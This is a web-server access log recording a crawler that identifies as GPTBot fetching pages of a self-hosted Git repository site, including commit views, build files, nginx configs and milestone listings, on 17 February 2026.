+[17/Feb/2026:16:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_upload/main/npm/data/nginx" +[17/Feb/2026:16:22:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/npm/data/nginx" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/nginx" +[17/Feb/2026:16:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/npm/data/nginx" +[17/Feb/2026:16:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 9946] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11063] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/status.json" +[17/Feb/2026:16:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json?display=source" [Client 74.7.227.38] [Length 11063] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" +[17/Feb/2026:16:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py?display=source" [Client 74.7.227.38] [Length 13676] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/tempCodeRunnerFile.py" +[17/Feb/2026:16:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/README.md" [Client 74.7.227.38] [Length 9826] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/README.md" +[17/Feb/2026:16:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11900] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PythonTest" +[17/Feb/2026:16:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor?display=rendered" [Client 74.7.227.38] [Length 14764] [Gzip 4.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:16:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/.gitignore" +[17/Feb/2026:16:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore?display=source" [Client 74.7.227.38] [Length 12042] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore" +[17/Feb/2026:16:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10911] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/.gitignore" +[17/Feb/2026:16:22:28 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/tsconfig.json" +[17/Feb/2026:16:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/tsconfig.json" +[17/Feb/2026:16:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9910] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:16:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:16:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10289] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:16:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24289] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:22:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/organizations?q=&sort=reversealphabetically" [Client 74.7.227.38] [Length 5081] [Gzip 2.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/organizations" +[17/Feb/2026:16:22:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=closestduedate&state=all" [Client 74.7.227.38] [Length 8502] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=closestduedate&state=open" +[17/Feb/2026:16:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=closestduedate&state=open" [Client 74.7.227.38] [Length 8505] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?sort=closestduedate&state=closed" +[17/Feb/2026:16:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=furthestduedate&state=open" [Client 74.7.227.38] [Length 8508] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=furthestduedate&state=closed" +[17/Feb/2026:16:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/milestones?sort=furthestduedate&state=all" [Client 74.7.227.38] [Length 8507] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/milestones?q=&sort=furthestduedate&state=open" +[17/Feb/2026:16:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/labels?sort=reversealphabetically&state=" [Client 74.7.227.38] [Length 7661] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/labels" +[17/Feb/2026:16:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 74.7.227.38] [Length 10991] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:16:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 74.7.227.38] [Length 10994] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:16:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:16:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:16:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9967] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:16:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26859] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:16:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:16:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets?display=rendered" [Client 74.7.227.38] [Length 10995] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:16:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:16:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf" +[17/Feb/2026:16:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf" +[17/Feb/2026:16:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf" +[17/Feb/2026:16:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf?display=rendered" [Client 74.7.227.38] [Length 11018] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf" +[17/Feb/2026:16:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12299] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12301] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp" [Client 74.7.227.38] [Length 12299] [Gzip 5.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:16:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11206] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=source" [Client 74.7.227.38] [Length 11269] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml?display=source" [Client 74.7.227.38] [Length 21063] [Gzip 6.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:16:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:16:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 11081] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:16:22:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 11080] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:16:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" [Client 74.7.227.38] [Length 11081] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:16:22:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.gitignore?display=rendered" [Client 74.7.227.38] [Length 11090] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.gitignore" +[17/Feb/2026:16:22:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/nginx.conf?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/nginx.conf" +[17/Feb/2026:16:22:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log?display=rendered" [Client 74.7.227.38] [Length 10967] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt-requests_error.log" 